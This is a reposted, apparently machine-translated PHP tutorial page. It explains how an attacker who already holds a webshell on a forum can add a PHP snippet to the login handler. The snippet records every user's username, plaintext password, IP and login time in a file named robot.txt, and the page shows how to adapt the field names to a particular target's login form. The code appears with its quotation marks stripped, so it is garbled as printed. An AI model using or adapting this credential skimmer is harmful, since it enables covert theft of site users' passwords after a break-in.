Home > Backend Development > PHP Tutorial > Code to intercept PHP background login password_PHP tutorial

Code to intercept PHP background login password_PHP tutorial

WBOY
Release: 2016-07-13 17:43:58
Original
1119 people have browsed it

After getting the webshell, if you want to penetrate further, the password such as discuz is not directly encrypted with md5, so it is very difficult to crack. I wrote it once for Big Tou before, and yesterday Brother Piggy happened to use it, so I wrote it again. The code is relatively simple, just a few sentences, I will explain the principle in detail, and take care of friends who don’t know much about PHP.

if($_POST[loginsubmit]!=){ //Determine whether the login button is clicked
$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s). rn; // Concatenate the values ​​received by POST and assign them to the variable $sb
fwrite(fopen(robot.txt,ab),$sb);} //The result is written to a file
The following is a brief analysis, taking Huaxia’s login page as an example. Open bbs.xxx.com/login.php, right-click to view the source code, CTRL+F search action to find the login form.
I only copied the key code.
//The value after the action is the address of the form submission, which will process the login, such as judgment Is the password correct? The method is POST, so use $_POST to receive it.
. . . . Powerful ellipsis. . . . . .
Account(U):
class=input id=pwuser accessKey=u size=16
name=pwuser> //Input box for user name, pay attention to the value of name, which must correspond to $_POST[username], so the password of Huaxia must be intercepted , needs to be changed to $_POST[pwuser]
Password (P):
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd> //Input box for user name, pay attention to the value of name, which should correspond to $_POST[username], So to intercept Huaxia’s password, you need to change it to $_POST[pwpwd]

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/478807.htmlTechArticleAfter getting the webshell, if you want to penetrate further, passwords such as discuz are not directly encrypted with md5, so it is difficult to crack. Very big. I helped Datou write once before, and Brother Piggy happened to use it yesterday...
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template